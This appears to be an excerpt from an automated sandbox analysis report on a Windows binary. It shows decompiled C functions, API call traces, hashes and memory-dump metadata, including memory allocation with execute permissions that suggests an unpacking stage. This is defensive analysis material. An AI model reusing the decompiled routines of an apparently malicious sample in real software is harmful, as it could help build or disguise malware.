                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 00BB8941
                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00BB894E
                  • CloseHandle.KERNEL32(?), ref: 00BB8960
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: CreateEvent$CloseHandlememset
                  • String ID:
                  • API String ID: 2812548120-0
                  • Opcode ID: 5051f5c87e03e943507ca4aec70278fb29a7b2bf1f044b0b5f437c7da0fdf31a
                  • Instruction ID: b72ebc8e7549231b3535aa0f146b570f933a9c6388dd69aa7202005e6a7baea7
                  • Opcode Fuzzy Hash: 5051f5c87e03e943507ca4aec70278fb29a7b2bf1f044b0b5f437c7da0fdf31a
                  • Instruction Fuzzy Hash: 39F054B1504308BFD7206F25DCC4C77BBECEB42298B114A6DF18692511CAB1E8058A71
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BB149B() {
                  				void* _t1;
                  				intOrPtr _t5;
                  				void* _t6;
                  				void* _t7;
                  				void* _t11;
                  
                  				_t1 =  *0xbbd26c; // 0x1ec
                  				if(_t1 == 0) {
                  					L8:
                  					return 0;
                  				}
                  				SetEvent(_t1);
                  				_t11 = 0x7fffffff;
                  				while(1) {
                  					SleepEx(0x64, 1);
                  					_t5 =  *0xbbd2b8; // 0x0
                  					if(_t5 == 0) {
                  						break;
                  					}
                  					_t11 = _t11 - 0x64;
                  					if(_t11 > 0) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_t6 =  *0xbbd26c; // 0x1ec
                  				if(_t6 != 0) {
                  					CloseHandle(_t6);
                  				}
                  				_t7 =  *0xbbd238; // 0x3220000
                  				if(_t7 != 0) {
                  					HeapDestroy(_t7);
                  				}
                  				goto L8;
                  			}









                  APIs
                  • SetEvent.KERNEL32(000001EC,00000001,00BB5C35), ref: 00BB14A6
                  • SleepEx.KERNEL32(00000064,00000001), ref: 00BB14B5
                  • CloseHandle.KERNEL32(000001EC), ref: 00BB14D6
                  • HeapDestroy.KERNEL32(03220000), ref: 00BB14E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: CloseDestroyEventHandleHeapSleep
                  • String ID:
                  • API String ID: 4109453060-0
                  • Opcode ID: baeb8f02dc43d0804d52ac27f5e70ee8319efbe6bd01e8bb5ce51dd7081518a3
                  • Instruction ID: 2aafeb5b7f5a2cdba0919de7e1aee0c6aa53e6d5bd9074b56cc52f464bc59d0b
                  • Opcode Fuzzy Hash: baeb8f02dc43d0804d52ac27f5e70ee8319efbe6bd01e8bb5ce51dd7081518a3
                  • Instruction Fuzzy Hash: 46F01C75A05311DBDB20BB79ED58AA73FE8EB047617844754B804D73A1DFE4C8409A60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E00BB1D3E(void** __esi) {
                  				char* _v0;
                  				intOrPtr _t4;
                  				intOrPtr _t6;
                  				void* _t8;
                  				intOrPtr _t11;
                  				void* _t12;
                  				void** _t14;
                  
                  				_t14 = __esi;
                  				_t4 =  *0xbbd32c; // 0x36195b0
                  				__imp__(_t4 + 0x40);
                  				while(1) {
                  					_t6 =  *0xbbd32c; // 0x36195b0
                  					_t1 = _t6 + 0x58; // 0x0
                  					if( *_t1 == 0) {
                  						break;
                  					}
                  					Sleep(0xa);
                  				}
                  				_t8 =  *_t14;
                  				if(_t8 != 0 && _t8 != 0xbbd030) {
                  					HeapFree( *0xbbd238, 0, _t8);
                  				}
                  				_t14[1] = E00BB769A(_v0, _t14);
                  				_t11 =  *0xbbd32c; // 0x36195b0
                  				_t12 = _t11 + 0x40;
                  				__imp__(_t12);
                  				return _t12;
                  			}











                  APIs
                  • RtlEnterCriticalSection.NTDLL(03619570), ref: 00BB1D47
                  • Sleep.KERNEL32(0000000A,?,00BB1971), ref: 00BB1D51
                  • HeapFree.KERNEL32(00000000,00000000,?,00BB1971), ref: 00BB1D79
                  • RtlLeaveCriticalSection.NTDLL(03619570), ref: 00BB1D95
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                  • String ID:
                  • API String ID: 58946197-0
                  • Opcode ID: a5be8ad558927438ef229ce3e96d8db147ad08660c14f256f7c89e5afd5de37d
                  • Instruction ID: 47f95e25060ddcc9aabafbdd1665ea004934162860b1726928c452c489b8f76f
                  • Opcode Fuzzy Hash: a5be8ad558927438ef229ce3e96d8db147ad08660c14f256f7c89e5afd5de37d
                  • Instruction Fuzzy Hash: 10F03474600A40DBD720EB78DC58B667BE4AB18340B888A60F502CB261DAA4E800CA2A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00BB98F9() {
                  				void* _v0;
                  				void** _t3;
                  				void** _t5;
                  				void** _t7;
                  				void** _t8;
                  				void* _t10;
                  
                  				_t3 =  *0xbbd32c; // 0x36195b0
                  				__imp__( &(_t3[0x10]));
                  				while(1) {
                  					_t5 =  *0xbbd32c; // 0x36195b0
                  					_t1 =  &(_t5[0x16]); // 0x0
                  					if( *_t1 == 0) {
                  						break;
                  					}
                  					Sleep(0xa);
                  				}
                  				_t7 =  *0xbbd32c; // 0x36195b0
                  				_t10 =  *_t7;
                  				if(_t10 != 0 && _t10 != 0xbbe836) {
                  					HeapFree( *0xbbd238, 0, _t10);
                  					_t7 =  *0xbbd32c; // 0x36195b0
                  				}
                  				 *_t7 = _v0;
                  				_t8 =  &(_t7[0x10]);
                  				__imp__(_t8);
                  				return _t8;
                  			}










                  APIs
                  • RtlEnterCriticalSection.NTDLL(03619570), ref: 00BB9902
                  • Sleep.KERNEL32(0000000A,?,00BB1971), ref: 00BB990C
                  • HeapFree.KERNEL32(00000000,?,?,00BB1971), ref: 00BB993A
                  • RtlLeaveCriticalSection.NTDLL(03619570), ref: 00BB994F
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                  • String ID:
                  • API String ID: 58946197-0
                  • Opcode ID: b27bbbdb920713b62521b142ff5f2a11c619445aa11e43335b2e7451f6c2b2d8
                  • Instruction ID: dc332444d56dbaacd53d47ee3ba75c6f745e080e90aba36676ce0aa3e5599771
                  • Opcode Fuzzy Hash: b27bbbdb920713b62521b142ff5f2a11c619445aa11e43335b2e7451f6c2b2d8
                  • Instruction Fuzzy Hash: 7DF0D478600500DFE768DF64DD99B657BE5EB09300B488259FA46CB371DBB4EC00DA2A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E00BB6108(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                  				intOrPtr* _v8;
                  				void* _t17;
                  				intOrPtr* _t22;
                  				void* _t27;
                  				char* _t30;
                  				void* _t33;
                  				void* _t34;
                  				void* _t36;
                  				void* _t37;
                  				void* _t39;
                  				int _t42;
                  
                  				_t17 = __eax;
                  				_t37 = 0;
                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                  				_t2 = _t17 + 1; // 0x1
                  				_t28 = _t2;
                  				_t34 = E00BB98E4(_t2);
                  				if(_t34 != 0) {
                  					_t30 = E00BB98E4(_t28);
                  					if(_t30 == 0) {
                  						E00BB5DE8(_t34);
                  					} else {
                  						_t39 = _a4;
                  						_t22 = E00BBA8D2(_t39);
                  						_v8 = _t22;
                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                  							_a4 = _t39;
                  						} else {
                  							_t26 = _t22 + 2;
                  							_a4 = _t22 + 2;
                  							_t22 = E00BBA8D2(_t26);
                  							_v8 = _t22;
                  						}
                  						if(_t22 == 0) {
                  							__imp__(_t34, _a4);
                  							 *_t30 = 0x2f;
                  							 *((char*)(_t30 + 1)) = 0;
                  						} else {
                  							_t42 = _t22 - _a4;
                  							memcpy(_t34, _a4, _t42);
                  							 *((char*)(_t34 + _t42)) = 0;
                  							__imp__(_t30, _v8);
                  						}
                  						 *_a8 = _t34;
                  						_t37 = 1;
                  						 *_a12 = _t30;
                  					}
                  				}
                  				return _t37;
                  			}















                  APIs
                  • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?,?,00000000), ref: 00BB6114
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                    • Part of subcall function 00BBA8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00BB6142,00000000,00000001,00000001,?,?,00BBA2F8,?,?,?,?,00000102), ref: 00BBA8E0
                    • Part of subcall function 00BBA8D2: StrChrA.SHLWAPI(?,0000003F,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?,?,00000000,00000000), ref: 00BBA8EA
                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?), ref: 00BB6172
                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00BB6182
                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00BB618E
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                  • String ID:
                  • API String ID: 3767559652-0
                  • Opcode ID: b93e2db8c8a07d2917df226452a58376cc5a33419c41825bfb5f7e1219102dd6
                  • Instruction ID: 06b08e0b860d0aa63de6e76dca7e7dc9b2a707476c74158b6799ae77bee65664
                  • Opcode Fuzzy Hash: b93e2db8c8a07d2917df226452a58376cc5a33419c41825bfb5f7e1219102dd6
                  • Instruction Fuzzy Hash: 6D218E72904255FBCB12AF78CC94AFA7FE8EF46780B148195F904AB212DAB5DD01D7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BB5115(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                  				void* _v8;
                  				void* _t18;
                  				int _t25;
                  				int _t29;
                  				int _t34;
                  
                  				_t29 = lstrlenW(_a4);
                  				_t25 = lstrlenW(_a8);
                  				_t18 = E00BB98E4(_t25 + _t29 + _t25 + _t29 + 2);
                  				_v8 = _t18;
                  				if(_t18 != 0) {
                  					_t34 = _t29 + _t29;
                  					memcpy(_t18, _a4, _t34);
                  					_t10 = _t25 + 2; // 0x2
                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                  				}
                  				return _v8;
                  			}









                  APIs
                  • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0361937C,?,00BB876F,004F0053,0361937C,?,?,?,?,?,?,00BB780E), ref: 00BB5125
                  • lstrlenW.KERNEL32(00BB876F,?,00BB876F,004F0053,0361937C,?,?,?,?,?,?,00BB780E), ref: 00BB512C
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00BB876F,004F0053,0361937C,?,?,?,?,?,?,00BB780E), ref: 00BB514C
                  • memcpy.NTDLL(74B069A0,00BB876F,00000002,00000000,004F0053,74B069A0,?,?,00BB876F,004F0053,0361937C), ref: 00BB515F
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrlenmemcpy$AllocateHeap
                  • String ID:
                  • API String ID: 2411391700-0
                  • Opcode ID: ba5672e6867fd7a658489956026258228f5c22a5b9855b39fff41b4bb9b7d62b
                  • Instruction ID: 56118cea49b5b0401db96eba82ae7f2bcce4c758cf1d0bd4165c5ab518d4641e
                  • Opcode Fuzzy Hash: ba5672e6867fd7a658489956026258228f5c22a5b9855b39fff41b4bb9b7d62b
                  • Instruction Fuzzy Hash: 2FF0EC76900119BB8F11EBA9CC45CDF7BACEF493547154066BA0897111E671EA14DBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrlen.KERNEL32(03619908,00000000,00000000,7742C740,00BB6053,00000000), ref: 00BBA765
                  • lstrlen.KERNEL32(?), ref: 00BBA76D
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • lstrcpy.KERNEL32(00000000,03619908), ref: 00BBA781
                  • lstrcat.KERNEL32(00000000,?), ref: 00BBA78C
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                  • String ID:
                  • API String ID: 74227042-0
                  • Opcode ID: 9f3045b25021535ed5d934b184cbc3a7948e46917c045e5e5e21cfc7f3b64282
                  • Instruction ID: c12d630cd699c2cde98b05919cc9b2d1b08ab5b81e3f0766d98179bc92d7654a
                  • Opcode Fuzzy Hash: 9f3045b25021535ed5d934b184cbc3a7948e46917c045e5e5e21cfc7f3b64282
                  • Instruction Fuzzy Hash: 20E09233901620A78711BBE4AC48CABBFACFF897517044557F600D3120CBA48C01CBE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,0000078E,00003000,00000040,0000078E,6E140D58), ref: 6E1413BF
                  • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040,6E140DBB), ref: 6E1413F6
                  • VirtualAlloc.KERNEL32(00000000,00012AF2,00003000,00000040), ref: 6E141456
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E14148C
                  • VirtualProtect.KERNEL32(6E0C0000,00000000,00000004,6E1412E1), ref: 6E141591
                  • VirtualProtect.KERNEL32(6E0C0000,00001000,00000004,6E1412E1), ref: 6E1415B8
                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E1412E1), ref: 6E141685
                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E1412E1,?), ref: 6E1416DB
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E1416F7
                  Memory Dump Source
                  • Source File: 00000003.00000002.473116666.000000006E140000.00000040.00020000.sdmp, Offset: 6E140000, based on PE: false
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
                  • Instruction ID: b136cb20ea30fcee9dfd9d58ef8b83c67fa73a1dcdf25729568b5ed2d3552465
                  • Opcode Fuzzy Hash: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
                  • Instruction Fuzzy Hash: F5D16776208A08DFDB51CF5AC8C0B5277A6EF8C320B290595ED0A9F75AD770B850DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  APIs
                  • ___crtGetLocaleInfoA.LIBCMT ref: 6E10A90B
                    • Part of subcall function 6E11185F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E11186B
                    • Part of subcall function 6E11185F: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E111880
                  • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E10A91D
                  • ___crtGetLocaleInfoA.LIBCMT ref: 6E10A93D
                  • ___crtGetLocaleInfoA.LIBCMT ref: 6E10A97F
                  • __calloc_crt.LIBCMT ref: 6E10A952
                    • Part of subcall function 6E10B167: __calloc_impl.LIBCMT ref: 6E10B176
                  • __calloc_crt.LIBCMT ref: 6E10A994
                  • _free.LIBCMT ref: 6E10A9AC
                  • _free.LIBCMT ref: 6E10A9EC
                  • __calloc_crt.LIBCMT ref: 6E10AA16
                  • _free.LIBCMT ref: 6E10AA3C
                  • __invoke_watson.LIBCMT ref: 6E10AA8C
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
                  • String ID:
                  • API String ID: 1731282729-0
                  • Opcode ID: 8bd77330b38939fa1344d345629bce8ef4d73ab333d3193767b1eb409824a7d5
                  • Instruction ID: 51cae7c0d1636e89e716d6ee9466b69b4b055271640f95c6bc85a92fa07bd417
                  • Opcode Fuzzy Hash: 8bd77330b38939fa1344d345629bce8ef4d73ab333d3193767b1eb409824a7d5
                  • Instruction Fuzzy Hash: 5851BF71A1421AAFEB60CFA58D41FDABBBDEF14314F6084A5F80992141EF318DD4AB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _wcscmp.LIBCMT ref: 6E127724
                  • _wcscmp.LIBCMT ref: 6E127735
                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E127751
                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E12777B
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: InfoLocale_wcscmp
                  • String ID:
                  • API String ID: 1351282208-0
                  • Opcode ID: c6341a5dbce270518687af483a9166dba13fd0f6f0700d7424f26c2d8e359106
                  • Instruction ID: a5055a90d9e015d4042af51f1c186057ccdf1a39a61fc09a1ac187abf6a24dd8
                  • Opcode Fuzzy Hash: c6341a5dbce270518687af483a9166dba13fd0f6f0700d7424f26c2d8e359106
                  • Instruction Fuzzy Hash: 95019231204516BFDF409EA5ED88FC737ACAF05765B218036F909DA1C4EB61D5C1B780
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _memset.LIBCMT ref: 6E109335
                    • Part of subcall function 6E10B752: __getptd_noexit.LIBCMT ref: 6E10B752
                  • __gmtime64_s.LIBCMT ref: 6E1093CE
                  • __gmtime64_s.LIBCMT ref: 6E109404
                  • __gmtime64_s.LIBCMT ref: 6E109421
                  • __allrem.LIBCMT ref: 6E109477
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E109493
                  • __allrem.LIBCMT ref: 6E1094AA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1094C8
                  • __allrem.LIBCMT ref: 6E1094DF
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1094FD
                  • __invoke_watson.LIBCMT ref: 6E10956E
                  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E10957D
                  • __aulldiv.LIBCMT ref: 6E10959D
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$Time$FileSystem__aulldiv__getptd_noexit__invoke_watson_memset
                  • String ID:
                  • API String ID: 2599720210-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                  • String ID:
                  • API String ID: 1442030790-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlDecodePointer.NTDLL ref: 6E10AD0E
                  • _free.LIBCMT ref: 6E10AD27
                    • Part of subcall function 6E10AB1D: HeapFree.KERNEL32(00000000,00000000,?,6E10DD47,00000000,00000001,00000000,?,?,?,6E10A62D,6E108593), ref: 6E10AB31
                    • Part of subcall function 6E10AB1D: GetLastError.KERNEL32(00000000,?,6E10DD47,00000000,00000001,00000000,?,?,?,6E10A62D,6E108593), ref: 6E10AB43
                  • _free.LIBCMT ref: 6E10AD3A
                  • _free.LIBCMT ref: 6E10AD58
                  • _free.LIBCMT ref: 6E10AD6A
                  • _free.LIBCMT ref: 6E10AD7B
                  • _free.LIBCMT ref: 6E10AD86
                  • _free.LIBCMT ref: 6E10ADAA
                  • RtlEncodePointer.NTDLL(6E24E390), ref: 6E10ADB1
                  • _free.LIBCMT ref: 6E10ADC6
                  • _free.LIBCMT ref: 6E10ADDC
                  • _free.LIBCMT ref: 6E10AE04
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                  • String ID:
                  • API String ID: 3064303923-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                  • String ID:
                  • API String ID: 3432600739-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • std::exception::exception.LIBCMT ref: 6E1085EA
                    • Part of subcall function 6E10A60F: std::exception::_Copy_str.LIBCMT ref: 6E10A628
                  • __CxxThrowException@8.LIBCMT ref: 6E1085FF
                    • Part of subcall function 6E1095D4: RaiseException.KERNEL32(?,?,6E13D110,6E13B25C,?,?,?,?,?,6E108556,6E13D110,6E13B25C,?,00000001), ref: 6E109629
                  • std::exception::exception.LIBCMT ref: 6E108618
                  • __CxxThrowException@8.LIBCMT ref: 6E10862D
                  • std::regex_error::regex_error.LIBCPMT ref: 6E10863F
                    • Part of subcall function 6E1083AB: std::exception::exception.LIBCMT ref: 6E1083C5
                  • __CxxThrowException@8.LIBCMT ref: 6E10864D
                  • std::exception::exception.LIBCMT ref: 6E108666
                  • __CxxThrowException@8.LIBCMT ref: 6E10867B
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                  • String ID: bad function call
                  • API String ID: 2464034642-3612616537
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __init_pointers.LIBCMT ref: 6E10DE09
                    • Part of subcall function 6E10AF51: RtlEncodePointer.NTDLL(00000000), ref: 6E10AF54
                    • Part of subcall function 6E10AF51: __initp_misc_winsig.LIBCMT ref: 6E10AF6F
                    • Part of subcall function 6E10AF51: GetModuleHandleW.KERNEL32(6E135EE8), ref: 6E110D88
                  • __mtinitlocks.LIBCMT ref: 6E10DE0E
                  • __mtterm.LIBCMT ref: 6E10DE17
                    • Part of subcall function 6E10DE7F: RtlDeleteCriticalSection.NTDLL ref: 6E111CA5
                    • Part of subcall function 6E10DE7F: _free.LIBCMT ref: 6E111CAC
                    • Part of subcall function 6E10DE7F: RtlDeleteCriticalSection.NTDLL(6E13D520), ref: 6E111CCE
                  • __calloc_crt.LIBCMT ref: 6E10DE3C
                  • __initptd.LIBCMT ref: 6E10DE5E
                  • GetCurrentThreadId.KERNEL32 ref: 6E10DE65
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                  • String ID:
                  • API String ID: 1551663144-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                  • String ID:
                  • API String ID: 3534693527-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _malloc.LIBCMT ref: 6E112838
                    • Part of subcall function 6E108902: __FF_MSGBANNER.LIBCMT ref: 6E108919
                    • Part of subcall function 6E108902: __NMSG_WRITE.LIBCMT ref: 6E108920
                    • Part of subcall function 6E108902: RtlAllocateHeap.NTDLL(6E24E9EC,00000000,00000001), ref: 6E108945
                  • _free.LIBCMT ref: 6E11284B
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: AllocateHeap_free_malloc
                  • String ID:
                  • API String ID: 1020059152-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E1283FB
                  • __isleadbyte_l.LIBCMT ref: 6E128429
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E128457
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E12848D
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___BuildCatchObject.LIBCMT ref: 6E10E28B
                    • Part of subcall function 6E10E980: ___BuildCatchObjectHelper.LIBCMT ref: 6E10E9B2
                    • Part of subcall function 6E10E980: ___AdjustPointer.LIBCMT ref: 6E10E9C9
                  • _UnwindNestedFrames.LIBCMT ref: 6E10E2A2
                  • ___FrameUnwindToState.LIBCMT ref: 6E10E2B4
                  • CallCatchBlock.LIBCMT ref: 6E10E2D8
                  Memory Dump Source
                  • Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                  • String ID:
                  • API String ID: 2901542994-0
                  Uniqueness

                  Uniqueness Score: -1.00%